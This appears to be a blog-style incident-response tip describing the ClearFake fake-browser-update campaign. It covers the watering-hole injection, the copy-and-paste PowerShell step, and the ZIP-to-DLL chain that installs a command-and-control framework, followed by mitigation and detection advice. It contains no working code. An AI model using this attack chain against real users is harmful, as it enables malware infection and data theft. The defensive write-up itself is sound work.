DFIR/DTR Tip: A New Execution Technique Using ClearFake Attack.

A new execution technique using threat actors to evade “defense” security controls in enterprises.

The name of this technique is "ClearFake," It's a JavaScript framework known to use drive-by downloads and social engineering techniques, often presenting fake “browser update” pages to users.

These attacks work by driving traffic to websites that are similar to legitimate ones, then presenting users with a page claiming that they need to perform a browser update to view the site’s content.

The goal is typically to get users to download malicious files, leading to data theft or deployment of further malware and persistence.

Threat actors are now using different methods to download and execute malware, moving away from embedding malicious payloads to employing a relatively new technique, EtherHiding.

So let’s going through a Scenario of Attack

In this scenario i have explained one of technique to drop malicious powershell scripts.

Note: In reference below, I have mentioned more scenarios.

So how usually does that happen? As initial action that happens by social engineering tactics to present a malicious “fake browser update” page to the victim user. This fake update page, delivered through JavaScript iframes, uses legitimate branding to trick a user into downloading a fake, malicious browser update package. The payload is then downloaded onto the victim’s machine.

This file or script has usually been packaged in different ways across various campaigns and as several different file type extensions, ranging from Windows executable (.EXE) files to Windows application files (.APPX). This payload, a malware loader, is designed to conduct further malicious activity on the victim host and boasts a number of capabilities, from information stealing to command-and-control (C2) mechanisms.

Threat actors are injecting malicious script code, which can download and execute malicious Script payloads. This malicious Script code is injected into the target website . These websites are then used to host malicious Script content and deliver it to victim users through “watering hole” style attacks.

A watering hole attack is a technique which often uses a legitimate website that has been compromised via other means or, in some cases, an impersonating website designed to look and feel like a website that the target victim would commonly navigate to (as a clickjacking technique)

By using a website that is familiar to the victim, the victim is more likely to frequently visit the website and interact with it, which enables an attacker to manipulate the victim’s trust.

When users visit a compromised website fake browser error prompt that asks the user to install a malicious update for their browser.

in these cases, the website belonged to legitimate businesses that were likely compromised through vulnerabilities allowing code to be injected. The error prompt instructs the user to manually execute malicious PowerShell code, so once a

1. The user visited a compromised website that referenced the attacker-controlled domain to produce the fake update prompt.
2. Then the user copied the malicious PowerShell code into the PowerShell console and executed it. By copying and pasting PowerShell
3. The user will drop another PowerShell Once the file executed successfully, the ZIP file will be downloaded to Temp file in the user directory
4. The PowerShell script will extract the ZIP file contents and execute any files with the “.exe” extension. To run the legitimate “file.exe” program and the malicious DLL “file.dll,” which installed the C2 framework.

So now let’s suggest some mitigation and detection rules:

• Deploy application control policies to restrict the execution of PowerShell scripts to only those users who need it for their job functions
• Enhance user awareness by notifying users, IT personnel, and security teams about this ongoing campaign and technique.
• Remind users of the threat of copying and executing code from untrusted sources.
• Regularly update and patch websites and third-party tools used in sites to prevent the exploitation of vulnerabilities that could allow code injection and unauthorized script execution.
• This malware campaign is a good case for EDR; to create a watchlist, so the detection team will be able to see the entire attack chain and better understand what happened after executing the original copy/paste code.
• Monitoring ClearFake associated domains and blocking them is one of the best ways to protect your users. Remember that once on the social engineering page, victims are only a few clicks away from running malicious code that could bypass your defenses.

Reference :-

• https://rmceoin.github.io/malwareanalysis/2023/08/06/clearfake.html
• https://blog.sekoia.io/clearfake-a-newcomer-to-the-fake-updates-threats-landscape/

Happy Investigation and Detection